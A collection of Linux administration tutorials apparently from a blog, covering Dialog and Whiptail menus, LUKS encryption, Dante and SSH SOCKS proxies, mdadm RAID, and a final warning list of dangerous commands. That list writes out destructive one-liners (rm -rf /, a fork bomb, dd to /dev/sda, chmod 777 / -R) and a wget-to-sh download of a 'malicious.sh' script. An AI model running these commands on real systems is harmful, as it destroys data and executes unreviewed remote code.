Creating Interactive Scripts in Linux: Using Dialog or Whiptail

In the world of system administration, it is common to encounter the need to automate tasks through shell scripts. However, sometimes we need to make these scripts interactive to facilitate the user experience, especially in environments where a full graphical interface is not available. This is where tools like Dialog and Whiptail come into play.

Both Dialog and Whiptail are tools that allow creating simple and functional graphical interfaces within a text terminal. These tools are very useful for developing menus, dialog boxes, selection lists, progress bars, and much more. Throughout this article, we will guide you through the basic concepts and practical examples of both tools so that you can use them in your own scripts.

What is Dialog?

Dialog is a command-line tool used to generate interactive dialog boxes in text-based terminals. It is widely used in shell scripts to create interactive menus, confirmation boxes, forms, progress bars, among others. Dialog allows users to interact with a script through a text-based user interface, which is especially useful in server environments where a full graphical interface is not available.

Installing Dialog

To install Dialog on a Debian or Ubuntu-based distribution, simply run the following command:

sudo apt-get update
sudo apt-get install dialog

For Red Hat-based distributions like CentOS or Fedora:

sudo yum install dialog

Basic Examples of Dialog

Simple Message Box

This example shows a simple message box with only an “OK” button:

#!/bin/bash
dialog --title "Message" --msgbox "Hello, this is a simple message box." 6 50

Explanation: In this script, --title defines the dialog box title, --msgbox is the type of dialog used, and "6 50" are the dimensions of the box (6 lines high and 50 characters wide).
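Dialog can also display the confirmation boxes mentioned earlier. As a minimal sketch (the box dimensions are arbitrary), --yesno asks a Yes/No question and reports the answer through its exit status: 0 for Yes, 1 for No, and 255 if ESC is pressed:

#!/bin/bash
dialog --title "Confirmation" --yesno "Do you want to continue?" 7 50
answer=$?
clear
if [ $answer -eq 0 ]; then
    echo "You chose Yes."
else
    echo "You chose No (or pressed ESC)."
fi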

Interactive Menu

The following example creates a menu where the user can select an option:

#!/bin/bash
option=$(dialog --title "Main Menu" --menu "Select an option:" 15 50 4 \
1 "Option 1" \
2 "Option 2" \
3 "Option 3" \
4 "Exit" 3>&1 1>&2 2>&3)
clear

echo "You selected option: $option"

Explanation: The menu is displayed with numbered options. Dialog writes the selected tag to standard error, so 3>&1 1>&2 2>&3 swaps stdout and stderr, letting the command substitution capture the user's selection in the option variable.

Selection List

In this example, the user can select one or more items from a list:

#!/bin/bash
options=$(dialog --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5 \
1 "Apache" off \
2 "MySQL" off \
3 "PHP" off \
4 "Python" off \
5 "Java" off 3>&1 1>&2 2>&3)
clear

echo "Selected packages: $options"

Explanation: --checklist creates a list of items with checkboxes, where off indicates that the checkbox is unchecked by default.

Progress Bar

Progress bars are useful for showing the progress of a task. Here’s an example:

#!/bin/bash
{
for ((i = 0 ; i <= 100 ; i+=10)); do
sleep 1
echo $i
done
} | dialog --title "Progress" --gauge "Installing..." 10 70 0

Explanation: --gauge is used to create a progress bar. The for loop simulates the progress of a task, increasing the bar by 10% every second.

What is Whiptail?

Whiptail is a lightweight alternative to Dialog that also allows creating text-based interactive interfaces in shell scripts. Although Whiptail offers a similar set of features, it is especially useful in systems where Dialog is not available or where a lighter tool is preferred.

Installing Whiptail

To install Whiptail on Debian, Ubuntu, and their derivatives:

sudo apt-get update
sudo apt-get install whiptail

In distributions like CentOS, Red Hat, and Fedora:

sudo yum install newt

Basic Examples of Whiptail

Simple Message Box

As with Dialog, you can create a simple message box:

#!/bin/bash
whiptail --title "Message" --msgbox "This is a simple message using Whiptail." 8 45

Explanation: This example is similar to Dialog, but using Whiptail. The dimensions of the box are slightly different.

Interactive Menu

Creating interactive menus is easy with Whiptail:

#!/bin/bash
option=$(whiptail --title "Main Menu" --menu "Choose an option:" 15 50 4 \
"1" "Option 1" \
"2" "Option 2" \
"3" "Option 3" \
"4" "Exit" 3>&1 1>&2 2>&3)
clear

echo "You selected option: $option"

Explanation: This script works similarly to the Dialog example, allowing the user to select an option from a menu.
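One detail worth adding, not shown in the original script: if the user presses Cancel or ESC, whiptail exits with a non-zero status and the variable stays empty. A minimal sketch of how to detect this right after the command substitution:

#!/bin/bash
option=$(whiptail --title "Main Menu" --menu "Choose an option:" 15 50 4 \
"1" "Option 1" \
"2" "Option 2" \
"3" "Option 3" \
"4" "Exit" 3>&1 1>&2 2>&3)
status=$?
clear
if [ $status -ne 0 ]; then
    echo "Selection cancelled."
    exit 1
fi
echo "You selected option: $option"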

Selection List

Whiptail also allows creating selection lists with checkboxes:

#!/bin/bash
options=$(whiptail --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5 \
"Apache" "" ON \
"MySQL" "" OFF \
"PHP" "" OFF \
"Python" "" OFF \
"Java" "" OFF 3>&1 1>&2 2>&3)
clear

echo "Selected packages: $options"

Explanation: In this example, "ON" marks the Apache checkbox as checked by default, while "OFF" leaves the others unchecked. Note that Whiptail's --checklist entries follow the form tag item status, which is why each package name is followed by an empty string (an unused description field).

Progress Bar

Finally, here’s an example of a progress bar with Whiptail:

#!/bin/bash
{
    for ((i = 0 ; i <= 100 ; i+=10)); do
        sleep 1
        echo $i
    done
} | whiptail --gauge "Installing..." 6 50 0

Explanation: This example is very similar to Dialog, but using Whiptail’s syntax.
Both Dialog and Whiptail are powerful and flexible tools that allow system administrators and developers to create interactive user interfaces within a terminal. Although both tools are similar in functionality, the choice between one or the other may depend on the specific needs of the system and personal preferences.

Dialog is more popular and widely documented, while Whiptail is a lighter alternative that may be preferred in systems where minimizing resource usage is crucial.

In this article, we have covered the basics of Dialog and Whiptail with practical examples that will allow you to start creating your own interactive scripts. Whether you need a simple menu, a message box, or a progress bar, these tools will provide the necessary functionalities to improve user interaction with your scripts.

Remember that the key to mastering these tools is practice. Try the examples provided, modify them to suit your needs, and continue exploring the many possibilities that Dialog and Whiptail offer to make your scripts more intuitive and user-friendly.

Video Script

Below are two example scripts of two interactive menus:
Dialog

#!/bin/bash

# Example of a menu using Dialog
dialog --menu "Select an option:" 15 50 4 \
1 "View system information" \
2 "Show disk usage" \
3 "Configure network" \
4 "Exit" 2>selection.txt

# Read the selected option
option=$(cat selection.txt)

case $option in
    1)
        echo "Showing system information..."
        # Corresponding commands would go here
        ;;
    2)
        echo "Showing disk usage..."
        # Corresponding commands would go here
        ;;
    3)
        echo "Configuring network..."
        # Corresponding commands would go here
        ;;
    4)
        echo "Exiting..."
        exit 0
        ;;
    *)
        echo "Invalid option."
        ;;
esac

The result is an interactive menu rendered by dialog in the terminal.
Whiptail

#!/bin/bash

# Example of a menu using Whiptail
option=$(whiptail --title "Main Menu" --menu "Select an option:" 15 50 4 \
"1" "View system information" \
"2" "Show disk usage" \
"3" "Configure network" \
"4" "Exit" 3>&1 1>&2 2>&3)

# Verify the selected option
case $option in
    1)
        echo "Showing system information..."
        # Corresponding commands would go here
        ;;
    2)
        echo "Showing disk usage..."
        # Corresponding commands would go here
        ;;
    3)
        echo "Configuring network..."
        # Corresponding commands would go here
        ;;
    4)
        echo "Exiting..."
        exit 0
        ;;
    *)
        echo "Invalid option."
        ;;
esac

With Whiptail, the result is an equivalent menu rendered in the terminal.
As you can see, the results are very similar.

References and Documentation

Extensive documentation for Dialog is available at https://invisible-island.net/dialog/dialog.html. For Whiptail, consult its manual page (man whiptail).

Partition and Disk Encryption with LUKS on Linux

Welcome to the fascinating world of partition and disk encryption on Linux using LUKS (Linux Unified Key Setup). In this chapter, we will explore in detail how to use LUKS to protect your sensitive data by encrypting your disks and partitions. From installing necessary tools to handling specialized commands, I will guide you step by step through this crucial process for your data security.

Installing Necessary Tools

Before diving into the world of encryption with LUKS, it is essential to ensure you have the appropriate tools installed on your system. Generally, most Linux distributions include these encryption tools by default, but it’s always good to verify.

You can install the necessary tools using your distribution’s package manager. In Debian-based distributions, like Ubuntu, you can run the following command in the terminal:

sudo apt install cryptsetup

If you are using a Red Hat-based distribution, like Fedora or CentOS, you can install the encryption tools with the following command:

sudo dnf install cryptsetup

Once you have installed cryptsetup, you will be ready to start working with LUKS.

Creating a LUKS Volume

The first step to encrypt a partition or disk on Linux is to create a LUKS volume. This volume will act as an encryption layer that protects the data stored on the partition or disk.

To create a LUKS volume, you will need to specify the partition or disk you want to encrypt. Make sure the partition is unmounted before proceeding. Suppose we want to encrypt the partition /dev/sdb1. The following command will create a LUKS volume on this partition:

sudo cryptsetup luksFormat /dev/sdb1

This command will initiate the process of creating the LUKS volume on the specified partition. You will be prompted to confirm this action, as the process will erase all existing data on the partition. After confirming, you will be asked to enter a password to unlock the LUKS volume in the future. Make sure to choose a secure password and remember it well, as you will need it every time you want to access the encrypted data.

Once the process is complete, you will have a LUKS volume created on the specified partition, ready to be used.

Opening and Closing the LUKS Volume

After creating a LUKS volume, the next step is to open it to access the data stored on it. To open a LUKS volume, you will need to specify the partition containing the volume and assign it a name.

sudo cryptsetup luksOpen /dev/sdb1 my_encrypted_partition

In this command, /dev/sdb1 is the partition containing the LUKS volume, and my_encrypted_partition is the name we are assigning to the opened volume. Once you run this command, you will be asked to enter the password you specified during the creation of the LUKS volume. After entering the correct password, the volume will open and be ready to be used.

To close the LUKS volume and block access to the encrypted data, you can use the following command:

sudo cryptsetup luksClose my_encrypted_partition

This command will close the LUKS volume with the specified name (my_encrypted_partition in this case), preventing access to the data stored on it until it is opened again.

Creating a File System on a LUKS Volume

Once you have opened a LUKS volume, you can create a file system on it to start storing data securely. You can use any Linux-compatible file system, such as xfs or btrfs.

Suppose we want to create an xfs file system on the opened LUKS volume (my_encrypted_partition). The following command will create an xfs file system on the volume:

sudo mkfs.xfs /dev/mapper/my_encrypted_partition

This command will format the opened LUKS volume with an xfs file system, allowing you to start storing data on it securely.

Mounting and Unmounting a LUKS Volume

Once you have created a file system on a LUKS volume, you can mount it to the file system to access the data stored on it. To mount a LUKS volume, you can use the following command:

sudo mount /dev/mapper/my_encrypted_partition /mnt

In this command, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS volume, and /mnt is the mount point where the file system will be mounted.

After mounting the LUKS volume, you can access the data stored on it as you would with any other file system mounted on Linux. When you have finished working with the data, you can unmount the LUKS volume using the following command:

sudo umount /mnt

This command will unmount the file system of the LUKS volume, preventing access to the data stored on it until it is mounted again.

Managing LUKS Volumes

LUKS provides several tools for managing volumes, including the ability to change the password, add additional keys, and backup the headers of the volumes.

To change the password of a LUKS volume, you can use the following command:

sudo cryptsetup luksChangeKey /dev/sdb1

This command will prompt you for the current password of the LUKS volume and then allow you to enter a new password.

If you want to add an additional key to the LUKS volume, you can use the following command:

sudo cryptsetup luksAddKey /dev/sdb1

This command will prompt you for the current password of the LUKS volume and then allow you to enter a new additional key.
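To review which key slots are in use, or to remove a passphrase that is no longer needed, cryptsetup also provides the following commands (shown here against the same /dev/sdb1 partition used in the examples):

sudo cryptsetup luksDump /dev/sdb1
sudo cryptsetup luksRemoveKey /dev/sdb1

luksDump prints the header information, including the occupied key slots, and luksRemoveKey asks for the passphrase you want to remove.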

To backup the header of a LUKS volume, you can use the following command:

sudo cryptsetup luksHeaderBackup /dev/sdb1 --header-backup-file backup_file

This command will backup the header of the LUKS volume to the specified file, allowing you to restore it in case the volume header is damaged.
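The counterpart command restores a previously backed-up header, for example after the header on the partition has been damaged:

sudo cryptsetup luksHeaderRestore /dev/sdb1 --header-backup-file backup_file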

Summary of Commands to Create Encrypted Volume with LUKS

sudo cryptsetup luksFormat /dev/DISK
sudo cryptsetup luksOpen /dev/DISK DECRYPTED_DISK
sudo mkfs.xfs /dev/mapper/DECRYPTED_DISK
sudo mount /dev/mapper/DECRYPTED_DISK /mount_point

Integration with crypttab and fstab

Once you have encrypted a partition or disk using LUKS on Linux, you may want to configure the automatic opening of the LUKS container during system boot and mount it at a specific point in the file system. This can be achieved using the crypttab and fstab configuration files.

crypttab Configuration

The crypttab file is used to configure the automatic mapping of encrypted devices during the system boot process. You can specify the encrypted devices and their corresponding encryption keys in this file.

To configure an encrypted device in crypttab, you first need to know the UUID (Universally Unique Identifier) of the LUKS container. You can find the UUID by running the following command:

sudo cryptsetup luksUUID /dev/sdb1

Once you have the UUID of the LUKS container, you can add an entry in the crypttab file to configure the automatic mapping. For example, suppose the UUID of the LUKS container is 12345678-1234-1234-1234-123456789abc. You can add the following entry to the crypttab file:

my_encrypted_partition UUID=12345678-1234-1234-1234-123456789abc none luks

It can also be done this way without using the UUID:

my_encrypted_partition /dev/sdb1 none luks

In this entry, my_encrypted_partition is the name we have given to the LUKS container, and UUID=12345678-1234-1234-1234-123456789abc is the UUID of the container. The word none indicates that no key file is used (the passphrase will be requested interactively at boot), and luks specifies that the device is encrypted with LUKS.

fstab Configuration

Once you have configured the automatic mapping of the encrypted device in crypttab, you can configure the automatic mounting of the file system in fstab. The fstab file is used to configure the automatic mounting of file systems during system boot.

To configure the automatic mounting of a file system in fstab, you first need to know the mount point and the file system type of the LUKS container. Suppose the mount point is /mnt/my_partition and the file system is xfs. You can add an entry in the fstab file as follows:

/dev/mapper/my_encrypted_partition /mnt/my_partition xfs defaults 0 2

In this entry, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS container, /mnt/my_partition is the mount point where the file system will be mounted, xfs is the file system type, defaults specifies the default mount options, and 0 2 specifies the file system check options.

Recommendations with crypttab

In the case of a server, I would not leave crypttab active: I would keep the entries written but commented out, and do the same in fstab, opening and mounting the volumes manually after each reboot, as shown below. This avoids having to use key files and prevents some derived issues, such as an unattended server getting stuck at boot waiting for a passphrase, or a key file having to be stored on disk.
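As an illustrative sketch of that recommendation (device names and mount points follow the earlier examples), the entries stay commented out and the volume is opened and mounted by hand after each reboot:

# /etc/crypttab (kept commented out)
# my_encrypted_partition /dev/sdb1 none luks

# /etc/fstab (kept commented out)
# /dev/mapper/my_encrypted_partition /mnt/my_partition xfs defaults,noauto 0 0

# Manual steps after a reboot:
sudo cryptsetup luksOpen /dev/sdb1 my_encrypted_partition
sudo mount /dev/mapper/my_encrypted_partition /mnt/my_partition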

Create SOCKS Proxy with Dante and OpenSSH

How to Create a SOCKS Proxy with Dante on Ubuntu

In the digital era, maintaining online privacy and security is more crucial than ever. One way to protect your identity and data on the internet is through the use of a SOCKS proxy server. This type of proxy acts as an intermediary between your device and the internet, hiding your real IP address and encrypting your internet traffic. In this article, we will guide you step by step on how to set up your own SOCKS proxy server on Ubuntu using Dante, a versatile and high-performance proxy server.

Starting Dante Installation

Before diving into the Dante setup, it’s essential to prepare your system and ensure it is updated. To do this, open a terminal and run the following commands:

sudo apt update
sudo apt install dante-server

These commands will update your system’s package list and then install Dante, respectively.

Configuring the danted.conf File

Once Dante is installed, the next step is to configure the proxy server. This is done by editing the danted.conf configuration file located at /etc/danted.conf. To do this, use your preferred text editor. Here, we will use vim:

vim /etc/danted.conf

Inside this file, you must specify crucial details such as the external and internal interfaces, the authentication method, and access rules. Below, we show you an example configuration that you can adjust according to your needs:

logoutput: syslog
user.privileged: root
user.unprivileged: nobody

# The external interface (can be your public IP address or the interface name)
external: eth0

# The internal interface (usually your server's IP address or loopback)
internal: 0.0.0.0 port=1080

# Authentication method
socksmethod: username

# Access rules
client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    log: connect disconnect error
}

# Who can use this proxy
socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    command: bind connect udpassociate
    log: connect disconnect error
    socksmethod: username
}

This configuration defines a SOCKS server that listens on all available interfaces (0.0.0.0) on port 1080. It uses username authentication and allows connections from and to any address.

Creating a User for the Proxy

For the proxy to be secure and not open to the public, it’s necessary to create a specific user for the connection. This is achieved with the following commands:

sudo useradd -r -s /bin/false username
sudo passwd username

Here, username is the username you wish for the proxy connection. The useradd command creates the user, and passwd allows you to assign a password.

Restarting and Enabling Dante Service

With the user created and the configuration file adjusted, it’s time to restart the Dante service and ensure it runs at system startup:

sudo systemctl restart danted.service
sudo systemctl enable danted.service
sudo systemctl status danted.service

Furthermore, it’s important to ensure that port 1080, where the proxy listens, is allowed in the firewall:

sudo ufw allow 1080/tcp

Verifying the Connection

Finally, to verify everything is working correctly, you can test the connection through the proxy with the following command:

curl -v -x socks5://username:password@your_server_ip:1080 https://whatismyip.com/

Remember to replace username, password, and your_server_ip with your specific information. This command will use your proxy server to access a website that shows your public IP address, thus verifying that traffic is indeed being redirected through the SOCKS proxy.

Setting up a SOCKS proxy server with Dante may seem complex at first, but by following these steps, you can have a powerful proxy system up and running in a short time.

You can configure a SOCKS5 proxy server using OpenSSH on Ubuntu 22.04, which is a simpler and more direct alternative in certain cases, especially for personal use or in situations where you already have an SSH server set up. Below, I explain how to do it:

Creating a SOCKS5 Proxy with OpenSSH

Unlike Dante, which lets us create a proxy service with authentication, with OpenSSH we create a tunnel on a port that can be used as a SOCKS proxy without any authentication of its own, so it is advisable to expose it only on localhost of a single computer (we explain this in more detail below).

Installing OpenSSH Server

If you don’t already have OpenSSH Server installed on your server that will act as the proxy, you can install it with the following command as long as it’s a Debian / Ubuntu-based distribution:

sudo apt update
sudo apt install openssh-server

Ensure the service is active and running correctly with:

sudo systemctl status ssh

Configuring the SSH Server (Optional)

By default, OpenSSH listens on port 22. You can adjust additional configurations by editing the /etc/ssh/sshd_config file, such as changing the port, restricting access to certain users, etc. If you make changes, remember to restart the SSH service:

sudo systemctl restart ssh

Using SSH as a SOCKS5 Proxy

To configure an SSH tunnel that works as a SOCKS5 proxy, use the following command from your client (not on the server). This command establishes an SSH tunnel that listens locally on your machine on the specified port (for example, 1080) and redirects traffic through the SSH server:

ssh -D 1080 -C -q -N user@server_address
  • -D 1080 specifies that SSH should create a SOCKS5 proxy on local port 1080.
  • -C compresses data before sending.
  • -q enables silent mode that minimizes log messages.
  • -N indicates no remote commands should be executed, useful when you only want to establish the tunnel.
  • user is your username on the SSH server.
  • server_address is the IP address or domain of your SSH server.

At this point, note that with the -D option you should specify only the port (without a bind address such as 0.0.0.0), because exposing the port to the entire network may allow other devices on the network to use this proxy without authenticating:

[ger@ger-pc ~]$ ssh -D 0.0.0.0:1081 root@192.168.54.100

If we check with the command ss or netstat, we can see that it is listening on all networks:

[ger@ger-pc ~]$ ss -putan|grep 1081
tcp LISTEN 0 128 0.0.0.0:1081 0.0.0.0:* users:(("ssh",pid=292405,fd=4)) 
[ger@ger-pc ~]$

However, if we connect by specifying only the port without 0.0.0.0 or without any IP, it will only do so on localhost:

[ger@ger-pc ~]$ ssh -D 1081 root@192.168.54.100

.......

[ger@ger-pc ~]$ ss -putan|grep 1081
tcp LISTEN 0 128 127.0.0.1:1081 0.0.0.0:* users:(("ssh",pid=292485,fd=5)) 
tcp LISTEN 0 128 [::1]:1081 [::]:* users:(("ssh",pid=292485,fd=4)) 
[ger@ger-pc ~]$

Connecting Through the SOCKS5 Proxy:

Now you can configure your browser or application to use the SOCKS5 proxy on localhost and port 1080. Each application has a different way of configuring this, so you will need to review the preferences or documentation of the application.
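For example, you can test the tunnel from the command line with curl; the socks5h scheme makes curl resolve DNS names through the proxy as well, and the port must match the one passed to -D:

curl -x socks5h://127.0.0.1:1080 https://whatismyip.com/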

Automating the Connection (Optional):
If you need the tunnel to be established automatically at startup or without manual interaction, you may consider using a tool like autossh to keep the tunnel connection open and reconnect in case it drops.
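A possible invocation, assuming autossh is installed and key-based authentication is configured so no password prompt is needed, would be:

autossh -M 0 -f -N -D 1080 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" user@server_address

Here -M 0 disables autossh's own monitoring port and relies on the SSH keepalive options to detect a dead connection and restart the tunnel.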

This is an effective way to establish a quick SOCKS5 proxy for a user or a few users, especially useful for bypassing network restrictions or securing your traffic on untrusted networks. The main advantage of this method is its simplicity and that it leverages existing SSH infrastructure without the need to configure additional software on the server.

How to create a software RAID on Linux with mdadm

Today we wanted to extend this article on how to create a software RAID on linux with mdadm. We start with the theory.

What is a RAID?

We can define a disk RAID as a group or array of independent disks; in fact, RAID is an acronym for Redundant Array of Independent Disks. The disks are combined by software or hardware to provide data redundancy and/or to expose the combined capacity of the disks as a single volume. This will be easier to understand when we define each RAID type later.

Difference between hardware RAID and software RAID

  • What is Software RAID?

Software RAID is, as the name says, software that allows RAIDs to be created at a logical level from the disks connected to our computer. It presents a logical volume that behaves according to the type of RAID configured.

  • What is Hardware RAID?

A hardware RAID is a physical device that allows a RAID of disks to be created. It can be a PCI or PCIe expansion card, or it can be integrated into the motherboard. This hardware includes everything necessary to run the RAID without using the processor or the system's RAM (as a general rule), and it can also include a cache, which can speed up read/write operations.

What are their main differences and the advantages of each one?

  • Hardware RAID requires hardware which carries a cost.
  • With hardware RAID, in case of disk failure, we only need to insert the new disk and the RAID is usually rebuilt without any additional steps (as a general rule).
  • Software RAID avoids the single point of failure that a RAID card represents: with hardware RAID, if that card fails, the RAID will not work.
  • In today’s systems the difference in performance compared to hardware RAID is less noticeable as processors are more powerful.
  • Hardware RAID does not use resources of the host machine’s processor.

Most used RAID levels

· RAID 0 (Data Striping, Striped Volume)

This RAID adds the capacity of the member disks together. For example, with two 1TB disks, this RAID gives us a 2TB volume. If the disks have different capacities, the smallest capacity is used for every member, and the same goes for the rotation speed (RPM, revolutions per minute). That is, with a 2TB disk at 7200RPM and a 1TB disk at 5400RPM, we end up with a 2TB volume (2 x 1TB) running at 5400RPM: the same total size, but slower. That is why it is important that the disks be similar.

On the other hand, in this type of RAID performance is the priority, not safety: there is no data redundancy, so if one disk fails the whole volume is lost.


· RAID 1 (mirror)

As in the previous RAID level (and in all of them), the disks should have the same capacity to avoid wasting space. In this mode the disks are configured as a mirror: the entire contents of one disk are replicated on the other, so for every two disks, one disk's worth of capacity is dedicated to redundant data. It is recommended for two disks. This RAID has an added advantage: faster multi-user reads, since data can be read from both disks at once. Writes, however, are slower, as they have to be performed on both disks.


· RAID 5

This RAID is the most popular due to its low cost. With 3 disks, approximately two thirds (about 67%) of the total disk capacity is usable; in general, with n disks the usable capacity is (n-1)/n. It requires a minimum of only 3 disks and tolerates the complete loss of one disk. Data is written in blocks striped across all the disks, so the more disks, the better the performance. Disk size also matters: the larger the disks, the longer it takes to rebuild the RAID after a disk failure. This RAID protects against failures by distributing the parity calculation across all the disks.

The weakness of this type of RAID is that, from the moment a disk fails until it is replaced and rebuilt, the volume is unprotected against the failure of another disk. This is where spare disks come in. A spare disk is a reserve disk that joins the array automatically when one of the disks fails; this way, up to two disks can fail (as long as the RAID is not still rebuilding when the second disk fails), avoiding the weak point mentioned above. When a spare disk is added, this setup is also known as RAID 5E. There are two types of spare: "standby spare" and "hot spare".

With a standby spare, a full rebuild takes place when the spare disk is brought in to replace the failed one; with a hot spare, this time is minimized.


· RAID 6

It can be described as the evolution of RAID 5, and it needs at least 4 disks. It works like RAID 5 but with a double parity stripe, which is also spread across all the disks. This type of RAID tolerates the total failure of up to two disks, even during a rebuild. It is less commonly used because, with few disks, the capacity of two disks is lost to parity: with 4 disks the array offers only about half of the raw capacity. The more disks in the RAID, the higher the proportion of usable capacity.

As in RAID 5, in RAID 6 spare disks can be added (usually called RAID 6E) to support a third failed disk (the latter can fail without corrupting the volume as long as the raid is not being rebuilt).


Nested RAID levels

Nested RAID levels are "RAID on RAID": a RAID of one type built on top of RAID(s) of another type. This way you can combine the benefits of each RAID level. For example:

  • RAID 0+1: a mirror of RAID 0 arrays. With 4 disks, two RAID 0 arrays are created, one per pair of disks, and a RAID 1 is then created on top of the two resulting volumes. This adds redundancy to RAID 0.
  • RAID 1+0: a RAID 0 of two mirrors (RAID 1). Two RAID 1 arrays are created, one per pair of disks, and a RAID 0 is then created on top of them.
  • RAID 50 (5+0): requires a minimum of 6 disks. A RAID 5 is created with each trio of disks, and a RAID 0 is then created on top of the resulting RAID 5 arrays. With 6 disks, roughly two thirds of the raw capacity is usable.

The most common RAID types are:

  • RAID 0: For storage of non-critical data of which loss is not important.
  • RAID 1: For operating systems, e.g. on servers. The operating system is usually installed on a RAID 1.
  • RAID 5: Storage in general because of its low cost and good reliability.

How to mount in linux each type of RAID with “mdadm”:

A RAID in Linux is very easy to configure by following the steps described below:

Step 1: Install mdadm; it is not usually installed by default on Linux.

In debian and derivatives:

apt-get install mdadm

On RedHat / CentOS and derivatives:

yum install mdadm


Step 2: Clear any previous RAID metadata (superblock) from the disks that will be part of the RAID, to avoid problems with existing configurations or file systems:

root@localhost:~# mdadm --zero-superblock /dev/hdb /dev/hdc

(and as many other disks as you are going to use). Alternatively, you can wipe the beginning of each disk with dd, as shown below.
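A typical way of doing this with dd (a sketch; adjust the device names to your disks, and note that wiping the first megabytes is usually enough to clear partition tables and old metadata):

dd if=/dev/zero of=/dev/vdc bs=1M count=100 status=progress
dd if=/dev/zero of=/dev/vdd bs=1M count=100 status=progress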

Step 3: The next thing would be to create the RAID, basically it would be with:

mdadm -C /dev/RAID_NAME --level=raid[NUMBER] --raid-devices=NUMBER_OF_DISKS /dev/DISK1 /dev/DISK2
  • RAID 0: A minimum of two disks are selected (e.g. vdc and vdd):
mdadm -C /dev/md0 --level=raid0 --raid-devices=2 /dev/vdc /dev/vdd

 


  • RAID 1: In the case of RAID 1 it is best to select a maximum of 2 disks / volumes (we use vdc and vdd as examples):

 

mdadm -C /dev/md0 --level=raid1 --raid-devices=2 /dev/vdc /dev/vdd

 


  • RAID 5: At least three disks:

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=3 /dev/vdb /dev/vdc /dev/vdd

 


If we want a spare disk (we have to add all the disks including the spare to the RAID from the beginning):

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=3 --spare-devices=1 /dev/vdb /dev/vdc /dev/vdd /dev/vde

 

 

  • RAID 6: At least 4 disks

 

mdadm -C /dev/md0 --level=raid6 --raid-devices=4 /dev/vdb /dev/vdc /dev/vdd /dev/vde

 

And with spare parts:

 

mdadm -C /dev/md0 --level=raid6 --raid-devices=4 --spare-devices=1 /dev/vdb /dev/vdc /dev/vdd /dev/vde /dev/vdf

 

 

If a disk in a RAID fails, we simply remove it and insert the new one; once the system has detected the new disk (you can check the system log in /var/log/messages), we run:

 

mdadm --add /dev/RAID /dev/NEW_DISK
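If the failed disk is still listed in the array (for example, it has not been physically removed yet), it should first be marked as failed and removed before adding the replacement; a quick sketch, with placeholder device names:

mdadm --manage /dev/md0 --fail /dev/OLD_DISK
mdadm --manage /dev/md0 --remove /dev/OLD_DISK
mdadm --add /dev/md0 /dev/NEW_DISK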

 

In case you want to stop a RAID:

 

mdadm --stop /dev/md0 && mdadm --remove /dev/md0

And to check the RAID status:

cat /proc/mdstat
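To make the array persist across reboots, it is also common practice to save its definition to mdadm's configuration file; the paths below are the usual ones on Debian/Ubuntu (on Red Hat derivatives the file is normally /etc/mdadm.conf and the initramfs step differs):

mdadm --detail --scan >> /etc/mdadm/mdadm.conf
update-initramfs -u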

And that is all on how to create a software RAID in Linux with mdadm.

If you liked the article leave a comment and/or share on your social networks.

See you soon!

Commands you should not run in Linux

In the vast world of Linux, the terminal is a powerful tool that grants users unprecedented control over their systems. However, with great power comes great responsibility. There are certain commands that, while they may seem harmless or curious at first glance, can cause irreparable damage to your system. In this article, we will explore ten of these lethal commands, explaining in detail why you should keep them away from your terminal.

The Devastating rm -rf /

We start with the infamous rm -rf / command, a statement that seems simple but hides destructive potential. This command deletes all system files, starting from the root (/). The -r modifier indicates that deletion should be recursive, that is, affect all files and directories contained in the specified directory, while -f forces deletion without asking for confirmation. Running this command as a superuser means saying goodbye to your operating system, your data, and any hope of easy recovery.

In short, be careful with executing recursive rm commands as we can delete more than we want:

  • rm -fr *
  • rm -fr */
  • rm -fr /*
  • rm -fr .
  • rm -fr ..

The Trap of :(){ :|: & };:

This enigmatic command is an example of a fork bomb. It defines a function called : that, when executed, pipes a call to itself into another call to itself and sends the resulting pipeline to the background. This causes a chain reaction, doubling the number of processes indefinitely and consuming system resources until the machine hangs. It is a denial of service attack against your own machine, pushing processing and memory capacity to the limit.

To better understand, :(){ :|: & };: is the same as running:

bomb() {
    bomb | bomb &
}
bomb

The Danger of dd if=/dev/zero of=/dev/sda

The dd command is a powerful tool used to convert and copy files at the block level. In this context, if=/dev/zero sets the input to a continuous stream of zeros, and of=/dev/sda designates the target device, usually the main hard drive. This command overwrites the entire disk with zeros, irreversibly erasing the operating system, programs, and user data. It is essential to understand the function of each part of the command before executing something as powerful as dd.

Downloading and Executing a Malicious File

For example, the command wget http://example.com/malicious.sh -O- | sh

This command uses wget to download a script from an Internet address and executes it directly in the shell with sh. The danger lies in executing code without reviewing it, coming from an unreliable source. It could be a malicious script designed to damage your system or compromise your security. It is always vital to verify the content of scripts before executing them.

Dangerous Modification of Permissions and Properties

Modifying permissions with, for example, chmod 777 / -R can render your system unusable.
chmod changes the permissions of files and directories, and 777 grants full permissions (read, write, and execute) to all users. Applying this recursively (-R) to the root (/) removes any form of access control, exposing the system to serious security risks. Any user could modify any file, with potentially disastrous consequences.

The chown nobody:nogroup / -R Command

Similar to the previous case, chown changes the owner and group of files and directories. Using nobody:nogroup assigns ownership to a user and group without privileges, applied recursively from the root, can leave the system in an inoperable state, as critical services and processes might lose access to the files necessary for their operation.

The Mysterious mv /home/your_user/* /dev/null

Moving files to /dev/null is popularly described as equivalent to deleting them, since /dev/null is a "black hole" device that discards everything it receives (in practice, mv with several source files fails because /dev/null is not a directory). Either way, commands of this kind aimed at your user directory can end in the loss of personal data, settings, and important files stored in your home.

The Dangerous find

The find command can be very dangerous, for example, if we execute the following command:

find / -name '*.jpg' -type f -delete

What happens is that find is a versatile tool for searching for files in the file system that meet certain criteria. This command searches for all .jpg files in the system and deletes them. Although it might seem useful for freeing up space, indiscriminately deleting files based only on their extension can result in the loss of important documents, memories, and resources.

 

Causing a Kernel Panic

The following command is often mentioned in this context, although strictly speaking it does not trigger a panic by itself: it sets the number of seconds the kernel waits before rebooting automatically after a panic occurs:

echo 1 > /proc/sys/kernel/panic;
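A command that really does force an immediate kernel panic (never run it on a machine you care about) is the magic SysRq trigger, available as root when SysRq is enabled:

echo c > /proc/sysrq-trigger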

